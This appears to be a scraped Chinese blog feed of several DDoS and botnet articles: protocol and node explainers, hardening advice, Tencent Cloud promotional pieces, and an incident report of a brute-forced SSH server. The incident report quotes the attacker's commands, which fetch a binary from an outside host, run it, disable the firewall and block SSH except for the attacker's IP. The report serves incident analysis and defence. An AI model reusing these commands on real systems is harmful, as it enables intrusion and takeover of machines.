僵尸网络是由多个系统元素组成,节点也是由PC端和高性能服务器以及移动设备,那么它们之间是怎么进行相互联系的呢?僵尸网络的节点有几种方式,它也是根据通信的协议进行控制,大家都知道,互联网有很多种协议,我们主要讲下僵尸网络利用哪几种协议进行控制? 僵尸网络出现最早时期,是通过IRC通信协议进行控制。随着攻击和防御技术的升级,通信协议由较简单的IRC向HTTP衍变,甚至更进一步的发展为P2P模式。僵尸网络随着通信协议的变化其网络拓扑结构也发什么了变化。由此也变得更加复杂和抗击性。首先我们说下IRC型僵尸网络:它是出现的最早、大数量存在的僵尸群。主要利用IRC协议构造命令与控制通道,容易创建。一个服务器可以很容易的创建和控制多台僵尸主机。那么,僵尸主机和C&C服务器之间是怎么进行通信的呢?僵尸程序执行后,会解码内置的配置信息,获取C&C服务器域名及端口,以此来建立三次握手连接,会通过发送固定前缀的NICK和USER命令,加入预定义频道后,僵尸程序会进入PINC/PONC状态等待接收指令。因此通过IRC协议对僵尸网络的控制是相对比较容易的。但也有不足之处,如果中央服务器被关闭,僵尸程序就会失去与C&C服务器的通信,因此攻击也就不存在啦。 接下来我们说下HTTP型僵尸网络:这种僵尸网络的规模不是很大,但攻击活动很频繁。国内的小企业每天有很多家被攻击。相比于IRC型僵尸网络,HTTP型僵尸网络对端口以及通信的加解密具有更大的灵活性。IRC必须要考虑隐蔽性和稳定性,其IRC服务器端口是固定的,而HTTP型通信端口默认为80,但由于是控制者搭建的C&C服务器,控制者就可以任意选择端口的设定。HTTP构建的通道,可以很容易的隐藏攻击活动信息,而且经过Web通信中很难被检测出来。HTTP型僵尸网络还具有后门性质,搜索基本的系统信息,拥有自动升级插件下载等功能。它虽然组建简单,控制灵活,但是抗击性不强,主服务器被破坏,整个僵尸网络差不多就处于瘫痪期了。 最后讲下P2P型僵尸网络:那什么是P2P呢?P2P即对等网络,如僵尸网络的各节点是处于对等的地位,因此在网络中人和人之间的相互沟通,数据的交换都是直接互换的,不需要使客户端连接到服务器才可以浏览,请求服务的模式。P2P型僵尸网络主要是基于P2P协议建立的命令与控制服务器的节点不再单一,可以通过网络中的任一节点控制整个P2P型僵尸网络。解决了IRC型和HTTP型控制服务器单点失效的问题。而且P2P协议可以定制,在网络检测中很难再发现未知特征的僵尸网络活动信息,而且P2P组建和控制的僵尸网络数量极其庞大,地域分布跨越多个国家,针对其控制者很难找到,所以对于这种僵尸网络打击效果也是微乎其微,也因此,现在这种的僵尸网络组建法也越来越流行。 近期墨者安全会针对一系列的内容为大家分享,目前DDoS攻击方式复杂多样化,而僵尸网络的主导就是流量攻击,因此多了解一些基础的知识,才能更有效的去做好应对的防护措施。所谓干一行爱一行,国家对待网络安全都是相当重视,从事与网络安全人员的我们更是义不容辞。

June 26, 2019 · 1 min · jiezi

带你了解僵尸网络是怎样组成的

在流量攻击中,攻击者通常利用大批量僵尸网络和大量肉鸡发送恶意访问请求,因此有些人就会想说僵尸网络是什么?对于不懂网络得人肯定是存有疑问的,所以也经常会在网络安全防护中遇到用户问到僵尸网络是什么?它来自哪里呢?那么,此篇文章带你了解僵尸网络是什么,怎么样组成的. 现实中,多么庞大的系统也都是由很多个微小的元素组成的,比如一粒灰尘也是由多种物质微粒组成的混合物,所以僵尸网络也不例外。那么组成这些系统的元素是如何联系起来的呢?因此墨者安全主要分享下关于僵尸网络的节点。僵尸网络由多个大量功能节点共同组成,这些节点可能是PC端、服务器或者移动设备。 大部分人认为DDoS攻击是来自PC端的僵尸网络,其实并非一定全是。随着技术的进步,服务提供商对带宽的提升以及高性能处理器的提升,使传统PC端的僵尸网络发展变得缓慢,因为PC端的带宽资源有限,可以利用的时间不确定,导致了黑客攻击会选择高性能的处理器方式。 1、普通PC节点组建的僵尸网络是由大量安全性能差的个人计算机通过长时间的发展组成的。组建的步骤是僵尸程序及其他的蠕虫、木马等恶意程序对那些防护措施弱的普通PC传播感染进而变为僵尸网络中的一员。当僵尸程序在受害主机上执行后就会进行一系列的复制,自启以及隐藏等行为。而且病毒查杀等方式是检测清除不掉的,长此以往,僵尸程序就会潜伏在受害主机上通过解析内置域名和端口进行通信,构建了僵尸网络的通道,会发送搜集被感染主机的信息。接入僵尸网络的僵尸程序将会被预先设置指令,给目标发起攻击。不发指令的情况下, Wireshark会捕获大量数据包,等待指令的下达。通过上面的步骤,一台普通PC就变成了任人宰割的僵尸主机(又称“肉鸡)。成为了黑客攻击的有利工具。普通PC是基本的僵尸网络节点.现阶段普通PC的感染和控制技术很成熟,所以许多攻击者可以很快速的利用PC节点组建僵尸网络对用户展开攻击。2、高性能,大带宽服务器对于黑客攻击作为僵尸网络节点更具有优势,一台高性能的服务器可以抵上百台PC的性能,所以利用服务器僵尸主机的高性能和高并发性,可以快速地构造并发出大量的复杂请求,所以黑客会利用服务器僵尸主机进行极大的攻击流量。服务器的安全性比PC高,一般会利用Web服务器组件的安全漏洞进行入侵,或者是利用内容管理系统等漏洞上传脚本后门程序控制服务器成为僵尸网络。以此应用不同的方式对用户进行攻击。 3、随着互联网和物联网的崛起,其黑客也将与时俱进,利用更多的移动设备节点作为组建的僵尸网络对用户造成威胁。现阶段主流的移动设备CPU达到了双核的1GHZ以上的运算速度。容量也是足够大的。而且安全防范更差,更容易变为僵尸网络。目前移动设备主要有Android和iOS两大系统平台,由于系统和生态环境的开放性等原因,更容易被植入恶意代码或者僵尸程序,经常我们通过第三方应用市场下载软件时被提示应用捆绑或者诱骗安装,这时候更容易变成僵尸网络,因此移动设备逐渐要超越普通PC,同时移动设备与服务器类似,组建的僵尸网络也有一定的优势,而且现在移动设备数量众多,还在高速增长,而且移动设备在线时间更长,基本都是维持在网络连接状态,很少进行关机或者重启操作。因此攻击者利用移动设备组成的僵尸网络随时进行持续不间断的发起DDoS攻击。 主要的僵尸网络节点组成部分是通过以上几种方式,个人观点,不喜勿喷。也欢迎大家有不同的意见可以多多交流沟通学习。对自己的要求是在网络安全技术知识方面每天进步一点点。

June 25, 2019 · 1 min · jiezi

DDoS诞生于二十世纪末你知道吗

针对从事于网络安全运维的我们来说,每天都会听到关于DDOS的话题,那所有“一切对存在的追问都以历史性为待征”来阐述,DDoS攻击(Denial of Service)即分布式拒绝服务,起源于20世纪的最后几年中,它横空出世后,在网络中发生的几次DDOS时间,使企业的网络运维安全人员变得心惊胆战,因此也成为了世界关注的焦点。在当时,即使对信息安全不了解的人也听过。 当一种新的技术诞生时,直接或间接应用的技术都有发展的=历程存在,也是有一定的规律而言,可分为四个阶段:1、探索期:新技术出现不久,有一些技术兴趣爱好者,出于好奇心不断探索尝试,利用系统中存在的漏洞和缺陷来达到内心的成就感。起初分布式拒绝服务是不存在一些利益等目的,只是因为有一些对计算机或高科技产品有兴趣的人,只是为了验证下该攻击手法,把它当做一种挑战,然后再向别人炫耀。所以最初针对攻击的行业是没有范围的,个人或者组织都是可能涉及。2、工具化:技术的应用方式开始定型,所以有人想到了此工具成为了实用性的攻击工具.可以变成强有力的牟取利益的工具。最早期利用这一工具的就是勒索组织,他们利用僵尸网络或者针对性的开发工具,通过对一些互联网盈利的企业,比如在线支付,游戏或者博彩网站等。也会有些小企业中招,这种情况一般都是恶意竞争者,通过犯罪组织在企业业务流量高峰期时攻击对方,造成对方信用以及名誉损失来降低对方的客户群体。这类攻击没有直接的证据,而且也很难溯源,但行为模式非常清晰。 3、武器化:跟随着互联网的发展,一些新的技术被当武器来使用,比如分布式拒绝服务就会发生在网络战中。网络战争可以对我们的生活、工作由此瘫痪等等。 4、普及化:根据DDOS防护技术的提升,DDOS攻击技术也在不断的增强,而且网络的便利使得该工具的范围以及维护的成本也在降低。在生活中也处处可以听到某某网站,某某公司收到了DDOS攻击,或者是某企业的数据被删除,加密等等。目前通常攻击者会利用DDOS来掩护安装隐性的一些木马,病毒等手段。 面对互联网的环境,墨者安全觉得针对网络需要做好必要的安全措施,不可以放任不管, DDOS攻击会越来越频繁,为了避免让攻击者有机可乘,应定期进行排查,做好最基础的防护。

June 24, 2019 · 1 min · jiezi

网站遭遇DDOS漏洞等状态该怎么解决

如今,随着互联网时代的进步到物联网的兴起,人们生活,出行交通工具,工作处处离不开网络购物,那息息相关的物品也就离不开各种的网站。因此在各种行业竞争非常激烈的情况下,同行之间雇佣黑客打压对手,攻击对方网站,致使网站瘫痪的事情常发生。今天主要分享下网站遭遇DDOS、漏洞等状态该怎么解决?有需要的朋友可以参考下。 1.首先是对网站的服务器进行安全部署,要想快速发展就必须要有稳定的基础支撑,那么基础设施就是奠基石。需要经常更换服务器的密码,不能长期使用一个,避免外泄。同时要对网站的文件夹进行权限设置,包括一些重要的数据,文件,图片目录,缓存目录等都可以对其进行无脚本执行权限的设置加密,对于模板的文件夹设置只读权限,这里不含PHP运行权限。对网站的后台地址也要进行更换,尽量不使用默认的admin,manage,houtai等名字命名的后台地址,网站的管理员的账号密码要设置成复杂点的,不要使用经常用的密码和数字,避免轻易被破解。2.针对网站的系统定期进行升级,打补丁修复漏洞,定期对网站进行全面的安全检测,对网站的脚本木马或者木马后门经常进行检测。因此要选择专业的网络运维公司,专业的安全运维人员不只是有专业的技术,更多的是有丰富的经验,针对网站漏洞的修复与木马后门的清除可以很好的解决与规避。 3.要对数据库以及网站的代码做到不定期的备份,现在有一些企业使用的虚拟云服务器等,如果有启用备份功能,就选择开启状态,选择固定的周期对这个网站的服务器进行定期备份,这样即使因为攻击或者是系统问题出现了数据丢失或删除的情况,就可以利用备份及时的恢复到网站最新的状态以及数据。还有要为企业网站部署SSL证书,防止网站数据被删、被盗,甚至被篡改以及被浏览器拦截,昨天墨者安全就遇见一个客户,他告诉我他的网站被百度拦截了,360和UC浏览器等都提示您访问的是存在未经证实信息的网站,谨慎访问等字样。还又提示被黑客攻击利用DDOS流量攻击,这时候就要隐藏网站的真实IP,利用替身防护将其恶意访问请求等过滤清洗掉,然后将正常的访问回源到源IP,这样就避免了攻击者对网站进行DDOS、CC攻击。 如过网站一旦被攻击,就会有各种各样的损失,比如企业的敏感数据和文件,还有涉及的用户个人信息银行账号等,这些都是企业的命脉所在,但网站做好安全防护,就不会有数据信息泄露的事情所发生,也避免了企业的在财产方面和信誉方面等各种损失。

June 20, 2019 · 1 min · jiezi

一次被僵尸网络病毒攻击的过程

事件背景回想起来应该算是去年的事情了, 时值 2019 年 1 月 24 日早上, 当时我正忙碌于开发手头的一个珠宝分销系统项目, 由于已经进行了多日封闭式开发, 项目初见效果, 准备放到内网服务器 A 上跑跑看. 项目的一些功能需要通过公网才能访问, 于是便打算通过一台之前就架设在公网的服务器 B上做 SSH 端口转发, 将服务器 A 指定端口映射到服务器 B 上. 多次尝试服务器账号密码进行 SSH 连接, 发现居然一直无法连上, 怕是被其它同事改了密码, 但是询问下发现其它人也无法连上.初步分析首先, 不可能是服务器物理机宕机, 因为服务器 B 根本不是一台真正的物理机, 而只是用 Vmware 开出来的一台虚拟机, 由于配置了外网地址的虚拟网卡, 所以可以通过外网访问. 这里说一下, 公司的网络平时都是跑在内网的, 有前辈写好的(也有可能是买其他公司的)的网络管理服务端, 项目本身也只允许跑在内网服务器, 需要外网访问只好用穿透技术. Vmware 的稳定性还是很好的, 上面的其他服务器仍然坚挺. 好在 Vmware 拥有虚拟机的直接控制权限, 发现依然可以使用 root 用户登录服务器 B, 这说明服务器密码尚未修改, 只是 SSH 出于什么原因挂了, 导致无法通过远程 SSH 登录.直接在 Vmware 管理界面用 root 用户登录, 通过ps auxf命令发现 sshd 进程依然跑得好好的, 最近的 updatetime 是很久之前. 另外, 可以通过ping命令得到服务器的回应. 查看路由器的流量数据, 发现这台服务器居然在短短的 10 多天内有近 3TB 的上传流量. 而这台服务器作为跳板机根本没跑什么其它高流量的服务, 显然这台服务器是被攻击了.先使用netstat -anp命令查看 TCP 连接情况, 发现这台服务器已经和182.100.67.***, 和 23.234.14.两台意义不明的服务器建立了连接, 查看 whois 发现 182.100.67.是属于江西新余的IP, 而23.234.14.居然是美国洛杉矶的. 看来攻击者为了攻击花了不少心思, 寻思用匿名的跳板机来混淆视线. 介于此时已经无法使用 SSH 远程登录, 攻击者应该是针对 sshd 做了什么动作, 攻击者八成是已经拿到 Shell 了, 而且由于监测到异常流量, 攻击者应该是在这台服务器中跑了什么病毒进程, 无奈ps auxf 列出的进程较多, 很多还是系统进程, 一时不好判断哪个是病毒进程. 查看 user 发现除了 root 没有新的用户被新建, 就打算用history看看会不会记录攻击者的攻击痕迹, 结果是, 居然没有.发现攻击方式但是要注意到 linux 的history是会话隔离的, 同一个用户用不同的会话登录, 不同的会话有不同的命令历史, 只有在所有会话关闭之后才会将不同会话的历史合并, 比如:session A:$ echo session_a$ history 1 echo session_a2 history# 不关闭 session A, session B 无法拿到 session A 的历史session B:$ echo session_b1 echo session_b2 history# 关闭 session A 和 session B 之后 打开 session C:session c:$ history1 echo session_a2 history3 echo session_b4 history也就是说, 如果攻击者仍然与这台服务器保持着 SSH 连接, 是无法看到命令行历史的. 于是重启 sshd 进程强制中断连接. 再次连接, 这时发现了不得了的事情, 下面是攻击者的关键命令行历史(一些无用的命令删掉了):56 shutdown -h now57 netstat -anp|grep 44358 vi /etc/ssh/sshd_config 59 service sshd restart60 netstat -anp|grep 44361 kill 232264 ifconfig65 tcpdump -i ens160 port 443 -nn -s0 66 systemctl status firewalld 67 systemctl stop firewalld68 systemctl disable firewalld71 netstat -anp|grep ssh72 kill -9 239673 netstat -anp|grep ssh89 service sshd restart90 cd /usr/bin91 wget http://23.234.14.:12345/servicese92 chmod 777 servicese93 ./servicese96 ifconfig97 iptables -I INPUT -p tcp –dport 22 -j DROP98 iptables -I INPUT -s 182.100.67. -p tcp –dport 22 -j ACCEPT看这些命令, 操作很流畅.首先 vi /etc/ssh/sshd_config 修改 sshd 配置, 估计攻击者意图查看 sshd 的连接方式.然后查看运行在 443 端口的进程并杀死, 这很奇怪, 印像中这服务器当初并没有在 443 跑什么东西, 攻击者为了保证 443 没有连接还用tcp dump抓取网卡的 443 端口的包.之后攻击者关闭了防火墙firewalld.攻击者再次重启了 sshd.关键的地方, 攻击者开始注入病毒程序, 进入/usr/bin, 使用wget从http://23.234.14.:12345把病毒程序servicese下载, 更改权限为777使程序能够被执行, ./servicese运行病毒程序.可耻的地方, 攻击者之前关闭了firewalld防火墙, 这里居然使用iptables加入 IP 限制, 把所有连接到 22 端口的 TCP 连接都拒掉, 即: iptables -I INPUT -p tcp –dport 22 -j DROP, 这直接导致之前无法通过 ssh 远程连接上, 但是攻击者留了一个后门, 就是允许182.100.67.*这个 IP 通过 22 端口进行 ssh 连接, 也就是之前查到的江西新余的 IP.现在攻击者的攻击方式很明了, 看起来攻击者并没有想象中的高明, 也从进程中找到了servicese进程, 说实话, servicese这个程序名还是有点意思的, 因为和系统的守护进程service长得比较像, 导致无法一眼看出这个程序有什么不对劲. 后面用 nmap 对美国的 IP 和新余的 IP 进行端口扫描了一下, 发现新余机子是一台 windows2008, 确实应该是攻击者用来攻击并连接的服务器, 而美国的服务器只是一个 http 服务器, 提供病毒程序的下载源地址. 发现被攻击的时候, http://23.234.14.:12345依然可以访问, 可以直接从那里下载病毒程序, 不过现在是被攻击者主动关闭, 无法访问.那么攻击者是如何拿到服务器的权限呢? 说起来也有点丢人, 猜测应该是暴力破解了. 因为这台服务器平时只是作为跳板机, 所以连接密码是弱密码, 很容易通过彩虹表或者试错 猜出来. 这里告诫各位: 代码千万行, 安全第一条, 密码太弱鸡, 开发两行泪.分析病毒样本现在要确定病毒程序servicese到底对服务器做了什么. 使用tail命令查看servicese二进制文件的最后几行的内容, 发现了:gnu_cxx15__mt_alloc_baseIjE9constructEPjRKj_ZNSt13runtime_errorC1ERKSs_nl_load_locale_from_archivewctrans_ZTS8CSubTask_ZNKSt12_Vector_baseIP14CThreadHttpGetSaIS1_EE13get_allocatorgnu_cxx15,runtime_error,Vector_baseIP14CThread等词直接表明这是一个使用 CPP 编写的程序, 于是采用 C 语言强大的反编译神器 IDA 对源程序进行反编译, 看能不能找到什么线索. 这里注意, 当病毒程序被从服务器拷贝到本地 windows 的时候, 直接就被 windows defender 给清理掉了, 可见这应该是一个已经被记录在案的病毒程序.我并不打算详细说 IDA 的分析过程, 只是在审查病毒程序的函数时发现了名为MainBeikong的函数, 然后网上一搜, 就发现了 360 团队发出的这篇文章:某僵尸网络被控端恶意样本分析. 这篇文章描述的病毒样本和我手上的这个病毒程序有惊人的相似度:都是 1223123 字节, 但是 MD5 貌似不一样, 我这边的是cde16928b968cb087c961a258ba45442, 文章给出的是 EFF1CB4E98BCC8FBCBDCA671D4C4A050, 应该是有改动;使用readelf获得的源代码文件名完全一致;病毒的攻击目标相似: 网络中bot节点多是一些存在弱口令或软件漏洞的 linux 主机, 这台服务器属于弱口令目标.攻击后端症状相似, 病毒在获得服务器控制权后会执行对外 DDOS 攻击, 也就是说此时服务器称为了攻击者的肉鸡, 攻击者可以使用服务器的 CPU 资源和网路资源对其它服务器进行流量攻击, 其攻击力度可以参考 360 团队那篇文章描述的, 这也就是为什我这边的路由器会有高额的异常流量.下面是readelf的结果:正如 360 团队那篇文章所言:通过此样本可以发现黑产团队的 DDoS 攻击实力已经到了"比较娴熟"的地步, 而根据样本中不同部分的不同代码风格猜测黑产团队可能存在多人多团队合作的编程方式或"黑吃黑"的代码盗用情况可见现在的互联网攻击确实不容小觑, 必须时刻注意安全问题.事后解决方案在了解到了该病毒程序的主要功能之后, 自然是不能让它继续作恶了, 在和同事交流之后决定采用比较彻底的方式: 把相关的攻击细节备份留作警示后直接关闭这个 Vmware 的虚拟机, 然后新开一台虚拟机代替原来的, 新的服务器不采用 ssh 账号密码登录, 而是直接采用证书的形式访问. 也就是编辑/etc/ssh/sshd_config为:PasswordAuthentication no然后为服务器生成证书, 详细过程可以参考: 设置 SSH 通过密钥登录,一般而言密钥登录是不容易被攻破的. ...

February 26, 2019 · 2 min · jiezi

放大倍数超5万倍的Memcached DDoS反射攻击,怎么破?

欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦本文由腾讯游戏云发表于云+社区专栏背景:Memcached攻击创造DDoS攻击流量纪录近日,利用Memcached服务器实施反射DDoS攻击的事件呈大幅上升趋势。DDoS攻击流量首次过T,引发业界热烈回应。现腾讯游戏云回溯整个事件如下:追溯2 月 27 日消息,Cloudflare 和 Arbor Networks 公司于周二发出警告称,恶意攻击者正在滥用 Memcached 协议发起分布式拒绝服务(DDoS)放大攻击,全球范围内许多服务器(包括 Arbor Networks 公司)受到影响。下图为监测到Memcached攻击态势。仅仅过了一天,就出现了1.35Tbps攻击流量刷新DDoS攻击历史纪录。美国东部时间周三下午,GitHub透露其可能遭受了有史最强的DDoS攻击,专家称攻击者采用了放大攻击的新方法Memcached反射攻击,可能会在未来发生更大规模的分布式拒绝服务(DDoS)攻击。对GitHub平台的第一次峰值流量攻击达到了1.35Tbps,随后又出现了另外一次400Gbps的峰值,这可能也将成为目前记录在案的最强DDoS攻击,此前这一数据为1.1Tbps。据CNCERT3月3日消息,监测发现Memcached反射攻击在北京时间3月1日凌晨2点30分左右峰值流量高达1.94Tbps。腾讯云捕获多起Memcached反射型DDoS攻击截止3月6日,腾讯云已捕获到多起利用Memcached发起的反射型DDoS攻击。主要攻击目标包括游戏、门户网站等业务。腾讯云数据监测显示,黑产针对腾讯云业务发起的Memcached反射型攻击从2月21日起进入活跃期,在3月1日达到活跃高峰,随后攻击次数明显减少,到3月5日再次出现攻击高峰。攻击态势如下图所示:下图为腾讯云捕获到的Memcached反射型DDoS攻击的抓包样本:腾讯云捕获到的Memcached反射源为22511个。Memcached反射源来源分布情况如下图所示:在腾讯云宙斯盾安全系统防护下,腾讯云业务在Memcached反射型DDoS攻击中不受影响。那么,什么是Memcached反射攻击?一般而言,我们会根据针对的协议类型和攻击方式的不同,把 DDoS 分成 SYN Flood、ACK Flood、UDP Flood、NTP Flood、SSDP Flood、DNS Flood、HTTP Flood、ICMP Flood、CC 等各类攻击类型。DDoS攻击的历史可以追溯到上世纪90年代,反射型DDoS 攻击则是DDoS攻击中较巧妙的一种。攻击者并不直接攻击目标服务 IP,而是通过伪造被攻击者的 IP向开放某些某些特殊服务的服务器发请求报文,该服务器会将数倍于请求报文的回复数据发送到那个伪造的IP(即目标服务IP),从而实现隔山打牛,四两拨千金的效果。而Memcached反射型攻击因为其高达数万倍的放大倍数,更加受到攻击者的青睐。Memcached反射攻击,就是发起攻击者伪造成受害者的IP对互联网上可以被利用的Memcached的服务发起大量请求,Memcached对请求回应。大量的回应报文汇聚到被伪造的IP地址源,形成反射型分布式拒绝服务攻击。为何会造成如此大威胁?据腾讯云宙斯盾安全团队成员介绍,以往我们面临的DDoS威胁,例如NTP和SSDP反射攻击的放大倍数一般都是3050之间,而Memcached的放大倍数是万为单位,一般放大倍数接近5万倍,且并不能排除这个倍数被继续放大的可能性。利用这个特点,攻击者可以用非常少的带宽即可发起流量巨大的DDoS攻击。安全建设需要未雨绸缪早在Memcached反射型DDoS攻击手法试探鹅厂业务之时,腾讯云已感知到风险并提前做好部署,这轮黑客基于Memcached反射发起的DDoS攻击都被成功防护。与此同时,腾讯云在捕获到Memcached攻击后,及时协助业务客户自查,提供监测和修复建议以确保用户的服务器不被用于发起DDoS攻击。应对超大流量DDoS攻击的安全建议DDoS攻击愈演愈烈,不断刷新攻击流量纪录,面临超越Tbps级的超大流量攻击,腾讯云宙斯盾安全产品团队建议用户做以下应对:1.需要加强对反射型UDP攻击的重点关注,并提高风险感知能力反射型UDP攻击占据DDoS攻击半壁江山。根据2017年腾讯云游戏行业DDoS攻击态势报告显示,反射型UDP攻击占了2017年全年DDoS攻击的55%,需要重点关注此种类型攻击。此次Memcached反射型攻击作为一种较新型的反射型UDP攻击形式出现,带来巨大安全隐患,需要业界持续关注互联网安全动态,并提高风险感知能力,做好策略应对。在行业内出现威胁爆发时进行必要的演练。2.应对超大流量攻击威胁,建议接入腾讯云超大容量高防产品应对逐步升级的DDoS攻击风险。建议配置腾讯云超大容量高防产品,隐藏源站IP。用高防IP充足的带宽资源应对可能的大流量攻击行为,并根据业务特点制定个性化的防护策略,被DDoS攻击时才能保证业务可用性,从容处理。在面对高等级DDoS威胁时,及时升级防护配置,必要时请求DDoS防护厂商的专家服务。 了解腾讯云新一代高防产品:https://cloud.tencent.com/pro… 3.易受大流量攻击行业需加强防范门户、金融、游戏等往年易受黑产死盯的行业需加强防范,政府等DDoS防护能力较弱的业务需提高大流量攻击的警惕。风险往往曾经出现过苗头,一旦被黑产的春风点起,在毫无防护的情形之下,就会燃起燎原大火。参考链接:https://blog.cloudflare.com/m…http://mp.weixin.qq.com/s/b0T…问答如何防范DDos攻击?相关阅读游戏出海,如何避开DDoS这座暗礁?3行代码,为QQ轻游戏加上语音互动能力《堡垒之夜》畅爽体验的秘诀了解一下! 【每日课程推荐】机器学习实战!快速入门在线广告业务及CTR相应知识

September 30, 2018 · 1 min · jiezi

做游戏的小伙伴们注意了,DDoS还可以这样破!

欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~本文由腾讯游戏云发表于云+社区专栏作者:腾讯DDoS安全专家、腾讯云游戏安全专家haroldchen 摘要:在游戏出海的过程中,DDoS攻击是游戏企业不得不面对的一个暗礁,如若应对不当,用户流失和口碑受损不可避免。对此,腾讯云新一代高防解决方案团队在中国香港、新加坡、美国硅谷等地上线了多个高防节点,通过一键接入,保证用户服务的稳定可用。此外,腾讯云新一代高防产品推出了创新的游戏行业DDoS防护策略-安全水印方案,用户一旦接入,就能享受到LOL,CF,DNF,王者荣耀等同的防护效果。后续无论攻击者如何尝试,服务器将一如既往地平稳运行,就和什么也没发生一样。7月的深圳,高温已持续一个多月。一家游戏公司的办公区里,平时稳重有加的运维小哥,今天却显得无比焦躁,手指急促地敲击着键盘,额头上沁出细细汗珠。身后的老板眉头紧锁,表情凝重。公司前几天在美服上线的新版本游戏,由于搭配了优化后的架构和高配服务器,以及流畅的体验和新颖的玩法,在海外玩家中获得了良好的口碑。然而今天公司不断接到玩家关于游戏卡顿/掉线的投诉,论坛上也乱成一团,早上还充满了赞誉之声的bbs,此刻却已被玩家的抱怨所淹没。在既没有运营活动,登录玩家数也没有异常的情况下,对局服务器的CPU利用率居然居高不下,网络连接数飙升,多次重启后也没有丝毫改善。这是怎么回事呢?经过从应用,进程,主机等多方面排查,公司最后锁定了数以百万计的IP来源。运维小哥最终确定:我们的游戏服务器遭受了DDoS攻击!DDoS攻击:游戏行业的毒瘤什么是DDoS攻击呢?DDoS攻击,是针对互联网企业的一种网络攻击,堪比游戏行业的毒瘤。和其他网络攻击直接窃取数据、偷盗金钱不同,DDoS攻击会让本该为用户提供服务的资源忙于应付攻击者的请求,从而让服务端瞬间失去服务能力,难以对正常用户的请求进行响应。以游戏企业为例,游戏服务端若不能及时收到/处理客户端发送的数据包,用户这边就会出现画面卡顿、技能释放延迟、玩家沟通不畅等情况,严重的甚至会导致客户端掉线。酣畅淋漓的游戏体验荡然无存,严重影响玩家的体验和留存。所谓武功再高,也怕菜刀。根据腾讯云新一代高防团队的分析,在被DDoS攻击的所有企业中,游戏企业占比高达7成,位居各行业之首。从峰值来看,DDoS攻击的最高峰值可高达1.23T,可谓来势凶猛。可以说,游戏企业已成为最易遭受DDoS攻击的对象,如若应对不当,用户流失和口碑受损不可避免。两派黑客:勒索攻击防不胜防游戏行业经过多年的发展,已成为一个“厮杀惨烈”的红海市场,伴随这个市场蓬勃发展的,还有各路DDoS攻击黑客组织。根据腾讯云新一代高防团队的情报分析,目前发起DDoS攻击的黑客组织,大体上可分为两种流派:DDoS-for-Bitcoin和DDoS-for-Hire 。DDoS-for-Hire较为典型。顾名思义,黑客受雇于行业恶意竞争者,替其向竞争对手发起DDoS攻击,以此获得丰厚的佣金。而因为DDoS攻击,竞品游戏体验下降,用户流失,恶性竞争者最终坐收渔翁之利。这个行业发展至今,甚至出现了部分站点通过提供技术支持,为黑客发起DDoS攻击大开方便之门,以从中收取数十至数百美元不等的会员费用,或者单次攻击数美元至数百美元的服务费,赚得盆满钵满。图片来源:国外DDoS攻击站点rocketstress.com而DDoS-for-Bitcoin 则更像是cyber世界的勒索者,以Armada Collective团伙最为典型。黑客一般通过邮件联系到企业负责人,勒索巨额的赎金或者比特币。一旦勒索请求被拒绝,企业将遭受数百G的DDoS攻击——这对于绝大部分中小互联网企业来说,无疑是灭顶之灾。今年以来,一个名为ACCN攻击小组的团伙(号称大多数成员来自Armada Collective),就对腾讯云上的多家游戏企业进行勒索并发起DDoS攻击。然而,交与不交,都是个问题。被勒索企业即使交了赎金,后续也无法避免不被继续勒索,或其他团伙的勒索。全球难题: DDoS攻击凶猛异常对于立志要出海的游戏企业来说,海外游戏市场虽然广阔,但是面临的DDoS攻击团伙数量更多、组织更为缜密,DDoS攻击的态势也更为猛烈。2016年9月,在线DDoS攻击服务商"vDOS"被取缔,其关闭前已成功帮助客户发起了15万次以上的DDoS攻击。今年4月,全球最大的DDoS市场WebStresser被关闭,关闭前WebStresser拥有超过13.6万名注册用户,近年来已提供超过400万次DDoS攻击服务!这仅仅只是海外DDoS攻击的冰山一角。而在这凶猛的DDoS攻击下,即使全球收入排名前列的游戏企业都深受其害。2017年8月,PoodleCorp的黑客组织对包括《守望先锋》《风暴英雄》《魔兽世界》在内的多个爆款游戏发起攻击,导致游戏网络出现异常,技术支持服务一度中断。今年7月,另一款爆款游戏《For Honor》遭受DDoS攻击,导致玩家无法连接到服务器,游戏厂商最后不得不通过发放游戏道具对玩家进行补偿,损失惨重。上述爆款游戏全都出自全球排名靠前的游戏企业,背后技术力量雄厚,尚且不能避免DDoS攻击,可以预见,对于试图出海拓展业务的中小游戏企业而言,如若未做好充分的准备,将很难在如此惨烈的DDoS攻击中绝地求生。出海必备:腾讯云新一代高防解决方案早在2017年,腾讯云新一代高防团队就注意到,越来越多的游戏行业用户,依靠腾讯云提供的便捷基础设施,努力开拓海外市场。在和大量客户沟通后我们了解到,在游戏出海的过程中,除了要克服文化和监管政策的差异之外,DDoS攻击也是游戏企业不得不面对的一个暗礁。基于此,针对海外DDoS攻击频发的特点,腾讯云新一代高防团队在中国香港、新加坡、美国硅谷等地上线了多个高防节点,通过一键接入,保证用户在享受本地接入的便利的同时,也确保了服务的稳定可用。此外,腾讯云新一代高防团队和行业内合作伙伴一起建设超大防护容量的高防节点,也将于近日在硅谷上线,可以让用户从容应对当前最大规模的DDoS攻击。针对游戏行业大量采用私有协议,部分攻击流量和业务流量难以区分的特点,腾讯云新一代高防团队提炼出了游戏行业通用的DDoS攻击防护解决方案——安全水印方案,该技术解决方案依托腾讯自营游戏10年DDoS对抗经验,安全性和可靠性经过了充分的实战检验;用户一旦接入,就能享受到LOL,CF,DNF,王者荣耀等同的防护效果。此外,腾讯云新一代高防解决方案目前支持IPv4和IPv6透明部署,可以完美应对美国IPv6部署比例超过30%的情况,双栈防护,为客户业务从IPv4过渡到IPv6提供平滑支持。回到开头的故事,运维小哥在开通腾讯云高防服务,并得到腾讯云新一代高防团队的专家支持后,服务器迅速恢复正常。之后在腾讯云新一代高防团队的专家建议下,游戏也接入了安全水印方案。后续无论攻击者如何尝试,服务器将一如既往地平稳运行,就和什么也没发生一样。了解更多腾讯云新一代高防产品相关信息,请戳:https://cloud.tencent.com/pro…问答游戏体系结构相关阅读团战开黑必备“良药”了解一下!再也不用担心网吧开黑队友听不清了!3行代码,为QQ轻游戏加上语音互动能力 【每日课程推荐】机器学习实战!快速入门在线广告业务及CTR相应知识

September 20, 2018 · 1 min · jiezi